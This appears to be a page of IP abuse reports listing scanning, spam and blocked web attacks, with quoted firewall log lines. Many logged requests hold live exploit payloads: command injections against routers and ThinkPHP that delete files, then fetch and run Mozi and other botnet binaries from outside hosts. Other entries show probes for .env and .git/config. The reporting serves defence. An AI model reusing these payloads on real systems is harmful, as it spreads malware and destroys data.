πΈπ¨
2.56.10.39
09 Feb 2022
Sending garbage to mail users
Email Spam
Spoofing
π³π±
194.99.46.91
27 Jan 2022
Sending out phishing emails to users
Email Spam
π¨π³
218.92.0.191
24 Jan 2022
ET SCAN Potential SSH Scan - Count 81 - Severity 2
Port Scan
Hacking
Brute-Force
Exploited Host
SSH
π¨π³
218.92.0.192
19 Jan 2022
218.92.0.192
ET SCAN Potential SSH Scan
Severity: 2
Count: 73
Hacking
SSH
π¨π³
114.215.174.68
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `28' ) client: 114.215.174.68, server: , request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
π¬π§
109.237.103.123
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' ) client: 109.237.103.123, server: , request: "GET /.env HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
π¨π³
210.13.110.60
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 210.13.110.60, server: , request: "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0"
show less
Hacking
Exploited Host
Web App Attack
π¨π³
113.220.25.131
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 113.220.25.131, server: , request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
π³π±
2.57.122.64
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' ) client: 2.57.122.64, server: , request: "GET /.git/config HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
ππ°
103.40.172.189
25 Dec 2021
odSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against ...
show more
odSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 103.40.172.189, server: , request: "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0"
show less
Hacking
Exploited Host
Web App Attack
π©πͺ
212.192.216.42
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `20' ) client: 212.192.216.42, server: , request: "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1"
show less
Hacking
Web App Attack
π·πΊ
195.54.160.149
15 Dec 2021
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) - 12/15/2021-10:55:28
ET WEB_SERVE ...
show more
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) - 12/15/2021-10:55:28
ET WEB_SERVER ThinkPHP RCE Exploitation Attempt - 12/15/2021-05:56:29
ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. - 12/15/2021-08:29:24
ET WEB_SERVER /bin/sh In URI Possible Shell Command Execution Attempt - 12/15/2021-09:51:46
SERVER-OTHER Apache Log4j logging remote code execution attempt - 12/15/2021-11:27:25
show less
Hacking
Web App Attack
π¨π³
47.115.46.167
03 Dec 2021
CronRAT C&C server
Hacking
Web App Attack
π¬π§
188.223.72.106
14 Sep 2021
ET DOS DNS Amplification Attack Inbound -- 2021-09-14 19:15:50
Hacking
185.183.159.52
06 Jun 2021
EXPLOIT-KIT IFRAMEr injection detection - leads to exploit kit
Hacking
Web App Attack
45.77.104.33
06 Jun 2021
MALWARE-OTHER Unix.Miner.Xbash variant dropped bash script
Hacking
Web App Attack
45.10.24.165
06 Jun 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `33' )
GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://194.156.91.112/bins.sh;%20chmod%20777%20bins.sh;%20sh%20bins.sh;%20tftp%20194.156.91.112%20-c%20get%20tftp1.sh;%20chmod%20777%20tftp1.sh;%20sh%20tftp1.sh;%20tftp%20-r%20tftp2.sh%20-g%20194.156.91.112;%20chmod%20777%20tftp2.sh;%20sh%20tftp2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20194.156.91.112%20ftp1.sh%20ftp1.sh;%20sh%20ftp1.sh;%20rm%20-rf%20bins.sh%20tftp1.sh%20tftp2.sh%20ftp1.sh;%20rm%20-rf%20* HTTP/1.1
show less
Hacking
Web App Attack
45.148.10.50
31 May 2021
Continuous attempts to traverse web directory:
(http_inspect) WEBROOT DIRECTORY TRAVERSAL
Hacking
Web App Attack
45.10.24.165
14 May 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `33' )
request: "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://194.156.91.112/bins.sh;%20chmod%20777%20bins.sh;%20sh%20bins.sh;%20tftp%20194.156.91.112%20-c%20get%20tftp1.sh;%20chmod%20777%20tftp1.sh;%20sh%20tftp1.sh;%20tftp%20-r%20tftp2.sh%20-g%20194.156.91.112;%20chmod%20777%20tftp2.sh;%20sh%20tftp2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20194.156.91.112%20ftp1.sh%20ftp1.sh;%20sh%20ftp1.sh;%20rm%20-rf%20bins.sh%20tftp1.sh%20tftp2.sh%20ftp1.sh;%20rm%20-rf%20* HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
125.44.210.191
14 May 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.44.210.191:59579/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
show less
Hacking
Exploited Host
Web App Attack
147.135.165.22
27 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /cgi-bin/rtpd.cgi?wget&http:/203.159.80.188/bin.sh;chmod&777&bin.sh;./bin.sh;rm&-rf&bin.sh;wget&https://iplogger.org/28iw96 HTTP/1.1"
show less
Hacking
Web App Attack
120.85.197.184
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.85.197.184:38143/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
show less
Hacking
Web App Attack
81.104.248.239
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' )
request: "GET /.env HTTP/1.1"
show less
Hacking
Web App Attack
64.77.244.130
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' )
request: "GET /.env HTTP/1.1"
show less
Hacking
Web App Attack
178.175.122.23
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://178.175.122.231:32770/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
show less
Hacking
Web App Attack